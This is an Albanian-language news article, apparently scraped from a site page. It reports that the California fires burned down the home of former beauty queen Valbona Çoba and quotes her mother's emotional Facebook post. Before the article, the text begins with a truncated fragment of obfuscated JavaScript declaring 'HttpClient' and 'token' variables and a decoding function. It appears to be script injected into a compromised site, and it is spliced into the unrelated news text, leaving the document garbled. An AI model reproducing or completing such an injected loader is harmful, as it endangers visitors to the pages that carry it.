;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Shkrumbohet shtëpia e Miss-it shqiptar në Kaliforni

By

Zjarri në Kaliforni ka djegur edhe shtëpinë e një Miss-i shqiptar.

Bëhet fjalë për Valbona Çoba e cila e përjetoi fatin e keq sikurse yjet ndërkombëtar, shumë prej të cilëve mbetën pa shtëpi në Malibu.

Bukuroshja shqiptare jeton prej vitesh së bashku me bashkëshortin dhe tre fëmijët e tyre.

Lajmin e hidhur e ka dhënë nëna e modeles e cila përmes një statusi në Facebook, ka përshkruar tmerrin e përjetuar teksa shtëpia e vajzës së saj u shkrumbua totalisht.

“Vetëm mbrëmë kjo ishte shtëpia e vajzës time të shtrenjt, Valbona Çoba që gumëzhinte nga të qeshurat, lojërat e tre ëngjëjve të saj, tre perëndive të mia. Ndikuar nga zjarret në Los Angelos, luanin si zjarrfikësa, të parët nxirrnin fëmijët jashtë, ju thonin se një lodër do merrnin me vete dhe dil…fjetën të qetë në ëndrrat e tyre se kishin shpëtuar njerëz, fëmijë por mbas mesit të natës, u ngritën të tronditur, të detyruar të dilnin shpejt nga shtëpia….nuk morën dot asnjë lodër. Flaka e kuqe po kërcënonte gjithçka njerëzore. Ishte fatkeqësi natyre në të gjitha dimensionet. Të gjithë qanë, Valbona ishte më e tronditura, po digjej një shtëpi e tërë, vite të tëra të saj si nënë, gjëra të dashura, private, kujtime…E rëndësishme është që të gjithë jemi mirë”, ka shkruar Reshida Çoba./Prive.al

Artikuj të ngjashëm